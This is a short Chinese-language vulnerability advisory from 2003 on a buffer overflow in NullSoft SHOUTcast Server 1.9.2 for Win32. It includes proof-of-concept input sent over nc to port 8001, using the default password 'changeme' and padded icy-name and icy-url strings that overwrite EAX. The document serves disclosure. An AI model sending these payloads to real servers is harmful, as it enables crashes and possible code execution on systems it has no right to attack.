发布时间:2003-11-03
更新时间:2003-11-03
严重程度:高
威胁程度:普通用户访问权限
错误类型:环境错误
利用方式:服务器模式
BUGTRAQ ID:8954
受影响系统 NullSoft Shoutcast Server 1.9.2 Win32
详细描述
lsoft SHOUTcast Server由于对授权用户提供的命令缺少充分边界检查
,登录后提交超长字符串的icy-name(Server Desc)和icy-url(Stream URL)命令
,可导致触发溢出.
测试代码
>nc target 8001
changeme
icy-name:AAA...[Ax275]BBBB[rewrite EAX]
icy-genre:DoS radio
icy-url:AAA...[Ax288]BBBB[rewrite EAX]
icy-pub:1
icy-irc:N/A
icy-icq:N/A
icy-aim:N/A
icy-br:160
...
stream audio data
...
P.S. Default password "changeme" !!!
相关信息
HEX <hex@hex_net_ru.securityfocus.com>.
参考:
http://www.securityfocus.com/archive/1/343177
相关主页:
http://www.shoutcast.com/